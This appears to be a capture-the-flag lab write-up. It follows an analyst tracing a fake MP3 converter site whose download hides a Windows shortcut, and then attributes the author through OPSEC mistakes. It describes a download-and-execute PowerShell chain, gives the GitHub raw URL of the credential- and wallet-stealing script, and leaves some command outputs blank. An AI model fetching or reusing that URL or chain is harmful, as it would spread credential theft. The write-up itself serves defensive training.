Investigating a Potentially Malicious YouTube to MP3 Converter Website
In the bustling digital world, where innovation often walks hand in hand with deception, McSkidy, a seasoned SOC analyst, found herself intrigued by whispers about a trending YouTube to MP3 converter website. Renowned for its sleek design and seamless functionality, it had gained rapid popularity among unsuspecting users. But McSkidy’s instincts told her that something was amiss.
The website’s meteoric rise seemed too convenient, and subtle inconsistencies in its operations suggested a darker narrative lurking beneath the surface. Armed with her investigative skills and a drive to uncover the truth, McSkidy decided to dig deeper. What began as a casual inquiry into an online tool soon unraveled into a complex web of malicious activity, poor OPSEC practices, and an overconfident adversary hiding in plain sight.
1. The Initial Investigation
The website, accessed via a browser, presents a professional-looking interface. The About Page attributes its creation to "The Glitch," seemingly simplifying attribution. It even claims to be "Secure" and "Safe" in its feature list, which immediately raises suspicions.
YouTube to MP3 Converters: Risks Galore
These tools have a notorious history of hosting significant risks:
Malvertising: Malicious ads exploit system vulnerabilities.
Phishing Scams: Users are lured into sharing sensitive information.
Bundled Malware: Files come with hidden, malicious payloads.
2. Downloading the Files
Testing the site involves using a YouTube link (e.g., https://www.youtube.com/watch?v=dQw4w9WgXcQ).
After downloading, we extract a download.zip file containing:
Analyzing the Files
File 1: song.mp3
Using the file command:
The output reveals it as a legitimate MP3 file:
Audio file with ID3 version 2.3.0, MPEG ADTS, layer III
File 2: somg.mp3
On running file somg.mp3, we discover:
MS Windows shortcut, with command line arguments
The file masquerades as an MP3 but is a Windows shortcut file (.lnk), capable of executing commands.
3. Digging Deeper with ExifTool
Using exiftool somg.mp3, we uncover:
The command disables PowerShell restrictions, downloads a malicious script from https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1, and executes it.
Examining the PowerShell Script
The script from https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1 :
The script collects sensitive information, including:
Cryptocurrency Wallets
Browser Credentials
The signature "Created by the one and only M.M." is embedded, providing a crucial lead.
Tracing MM on GitHub
Searching for "Created by the one and only M.M." on GitHub reveals repositories linked to MM's handle.
This OPSEC failure leads us to incriminating evidence:
MM’s GitHub activity reveals their involvement.
A single commit in the repository exposes their role in crafting the malicious script.
The Lessons: OPSEC and Attribution
This case underscores the importance of Operational Security (OPSEC) for both attackers and defenders. Some common mistakes include:
Reusing handles or email addresses.
Including identifiable metadata in code.
Failing to anonymize online activities.
Real-World OPSEC Fails
AlphaBay Admin Takedown: Reused email and usernames linked Alexandre Cazes to the dark web marketplace.
APT1 Chinese Hackers: Predictable naming and time-based patterns exposed their identity.
Conclusion
This investigation highlights how seemingly minor breadcrumbs can unravel a malicious actor's identity.